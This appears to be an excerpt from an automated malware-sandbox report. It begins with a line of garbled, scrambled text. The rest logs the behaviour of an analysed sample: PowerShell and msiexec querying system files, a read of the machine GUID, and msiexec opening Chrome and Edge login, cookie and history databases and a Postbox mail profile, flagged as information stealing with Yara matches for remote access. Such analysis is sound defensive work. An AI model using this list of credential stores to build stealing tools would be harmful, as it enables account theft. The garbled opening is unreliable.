hjeq ei flyvlrussiorektou eskysskudd=be ry$sabr dyokeaelachrlkie,egarbejgtergie frazl irrusinquieart is.orma.maghissm gepindvilu affisaddutlden.(rea i$tr,ckczigzaoudestlkar oe ieclolaspeppelortregnlebaronrnatioo cereikogendpark,) inct ');forbindingers (franarrendes 'hu,ba[ ,nten lasse guiltpedan.inse.senergeh vedrgnistvdivi.iin,rtcungd efortipfun,oo affaicloamncompitepichmbugh ab.rnenbarquanonutg altaeanaerrunpro]arbej: vndg: lumbssparserentec ,nteu semirwigeoi sluktchokiy mu kpgolemrspe c			Jump to behavior

Language, Device and Operating System Detection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation			Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Source: Yara match

File source: 00000008.00000002.2988377794.00000000242C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites			Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: Yara match

File source: 00000008.00000002.2988377794.00000000243C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match

File source: 00000008.00000002.2988377794.00000000242C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY